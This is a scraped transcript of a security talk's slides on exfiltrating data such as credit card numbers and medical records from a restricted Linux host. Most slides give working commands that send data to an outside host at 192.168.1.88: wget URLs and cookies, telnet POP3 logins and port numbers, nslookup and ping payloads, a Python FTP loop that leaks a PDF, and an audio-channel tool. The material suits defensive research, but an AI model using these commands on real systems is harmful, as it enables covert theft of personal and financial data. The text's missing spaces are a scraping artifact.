Goodbye Data, Hello Exfiltration
-
Upload
itzik-kotler -
Category
Software
-
view
155 -
download
3
Transcript of Goodbye Data, Hello Exfiltration
ExfiltrationistheNewInfiltration
• TheIdentifyTheftResourceCenter(ITRC)reportsthatbetween2005– 2016atotalof847,807,830 recordsexposedduetodatabreachincidents
• There’snoquestionIF acompanywillgetbreached,onlywhenandwhatwillbetheoutcome
• Gettinginispromised,butisgettingtotheASSET andEXFILTRATINGitisgiven?No…
RulesofEngagement
• Ubuntu14.04.3(Server)LTSVanillaInstallation
• StandardUserAccount(NoRoot/AdministratorPrivileges)
• Nocompilers(C,C++etc.)orInterpreters(Python,Rubyetc.)
• Read-onlyFilesystem
ChooseYourDestiny:Assets
• SocialSecurityNumber(SSN)• CreditCards(CC)• MedicalRecords(PHI)• PersonalRecords(PII)• ...
HTTPGET:ExfiltrationviaURL
• wget is afreesoftwarepackageforretrievingfilesusingHTTP,HTTPSandFTP.Itaccepts*any*URLasaparameter.
• Wecanuseabusewget’s URLparametertoembeddedourdatainit.
• It’ssimple andstraightforward,butworkslikeacharm:-)
$ wget http://192.168.1.88/4716846291594680
HTTPGET#2:ExfiltrationviaCookie
• wget alsoallowustospecifyourownHTTPHEADERS
• Wecanabusewget’s headerfeaturetospoofaCookie(e.g.JSESSIONID)andembeddedourdataasit’svalue
• Wecanspoofothercommonfieldssuchas:User-Agent,Accept,andIf-None-Matchtonameafew
$ wget --header="Cookie: JSESSIONID=4716846291594680" http://192.168.1.88
POP3:ExfiltrationviaAuthentication
$ telnet 192.168.1.88 110Trying 192.168.1.88...Connected to 192.168.1.88.Escape character is '^]'.+OK POP3 serviceUSER foobar+OK password required for user foobarPASS 4716846291594680-ERR [AUTH] Authentication failed
HowItWorks?
• telnetclientisafreesoftwareusedforopeninganinteractivecommunicationwith*any*hoston*any*TCPport
• POP3isatext-basedprotocolusedfor receivingemails,itrequiresauthenticationbeforeallowingaccesstoamailbox.
• Wecanabusetheauthenticationmechanism(notspecifictoPOP3)andusetheUSERNAMEand/orPASSWORDvalue(s)asawaytoexfiltrate thedata
TCP:ExfiltrationviaSYN(DestinationPort)
$ telnet 192.168.1.88 4716 ; telnet 192.168.1.88 8462 ; telnet 192.168.1.88 9159 ; telnet 192.168.1.88 4680Trying 192.168.1.88...telnet: Unable to connect to remote host: Connection refusedTrying 192.168.1.88...telnet: Unable to connect to remote host: Connection refusedTrying 192.168.1.88...telnet: Unable to connect to remote host: Connection refusedTrying 192.168.1.88...telnet: Unable to connect to remote host: Connection refused
HowItWorks?
• ThetelnetclienttakeshostandTCPportasparameter.ItwillthenproceedtoopenTCPconnectiontothegivenhostatthegivenport.
• Wecanabusetelnet’sTCPportparametertoembeddedourdatainit.Thismeanswecontrola16-bitfieldinaSYNpacketthatwillbesentto*any*destinationwewant
• Bysplittingtheasset(i.e.4716846291594680) togroupsof4digits(e.g.4716 ,8462,9159etc.)wemakesureeachportfallswithintherangeofavalidTCPport(216).
DNS:ExfiltrationviaQuery(CustomServer)
• nslookup isafreesoftwareforqueryingDNSservers.ItacceptsanoptionalargumentofDNSservertoconnecttoforthequery
• WecanabusetheoptionalDNSserverargumenttoconnecttoourownserverandusethenameparameteraswaytoembeddedourdataintherequest
• Again,simpleandstraightforward-- butworkslikeacharm:-)
$ nslookup www.4716846291594680.com 192.168.1.88
DNS:ExfiltrationviaQuery(ControlledNS)
• Whenyouownadomain,yougettodecidetheNS(Nameserver)willbeusedtodeliverit.
• WecanuseabusethewaythattheDNSprotocolworkstogetahitonourNSserverandhavethedataembeddedinthehit(Query).
• It’ssimpleandstraightforward,butcostly;-)
$ nslookup 4716846291594680.safebreach.com
OtherUDPApplications
• ntpdate (123/udp)-- setthedateandtimeviaNTP• dhclient (68/udp)-- DynamicHostConfigurationProtocolClient
ICMP:ECHOREQUEST(aka.Ping)
• wget is afreesoftwarepackageforretrievingfilesusingHTTP,HTTPSandFTP.Itaccepts*any*URLasaparameter.
• Wecanuseabuseping’spatternfeaturetoembeddedourdataintheICMPECHO_REQUESTpacket.
• It’ssimpleandstraightforward,butworkslikeacharm:-)
$ ping -p 4716846291594680 192.168.1.88
AssetChange
• SofarourassetwasaalphanumericString,butwhatifitwasBinary?ThismeansweneedEncoding
• Sofarourassetwasrelativelysmall,butwhatifitwasafilelikeaPDF,XLS,TIFFetc.?ThismeansweneedtoSplitit
• Forthesecases,let’sbendtherulesalittlebitandusePython(Python2.7.6comespreinstalledonourUbuntu;sowe’renotviolatingourRead-onlyFilesystem rule!)
EncodingwithPython
$ python>>> # SECRET.PDF Encoded in Hex >>> hex_encoded_asset = open(‘SECRET.PDF’).read().encode(‘hex’)>>> # SECRET.PDF Encoded in Base64>>> b64_encoded_asset = open(‘SECRET.PDF’).read().encode(‘base64’)>>> # Applying ROT13 on the Base64 Encoded Asset>>> b64_encoded_rot13_asset = b64_encoded_asset.encode(‘rot13’)
SplittingwithPython
$ python>>> # We’ll use SECRET.PDF Encoded in Hex as a Sample Asset>>> hex_encoded_asset = open(‘SECRET.PDF’).read().encode(‘hex’)>>> # Split by 16 bits (i.e. WORD Size)>>> import re>>> word_size_splitted = re.findall('..?', hex_encoded_asset)>>> # Split by 0xFF (i.e. Delimiter)>>> ff_splitted = hex_encoded_asset.split(‘ff’)
EndGame:MKDIR’ing anAssetoverFTP
$ python>>> import re>>> import ftplib>>> ftp = ftplib.FTP(‘192.168.1.88', ‘ftp', ‘ftp')>>> data = open(‘SECRET.PDF’).read().encode('hex')>>> for dir_name in re.findall('.?.?.?.?.?.?.?.', data):... i = locals().get('i', 0) + 1... ftp.mkd('%s_%s' % (i, dir_name))>>>
ChangingtheRules[ForTheLastTime!]
• ExfiltrationisnotaNetworkproblem,thereareotherwaystoextractdatafromaComputer.USBandThunderboltaretooobvious!
• Forthisonewe’llneedtobendtheRead-onlyFilesystem todownloadaPythonscript(nootherdependenciesarerequired!)
• It'stimetofacethemusic:-)
DEMO$ git clone https://github.com/iiamit/data-sound-poc$ cd data-sound-poc/$ python data2sound.py –i message.txt -o foobar.wav
HowItWorks?
• Modulation:• Wemodulatethedataononehand,anddemodulateitintheother.• Thisishowold-schoolModem(modulator-demodulator)areworking
• There’snoLayer1(e.g.V.42)orLayer2(HDLC,SLIP,PPP,etc.)sothere’sbothlimitedfunctionalityandbandwidth.Inotherwords,noteffectiveforbigfiles.
• Any3.5mmjackcanbeusedtooutputthedatafromalmostanyComputerwithHeadphonessupport.
Thank You!Twitter:@itzikkotler /Email:[email protected]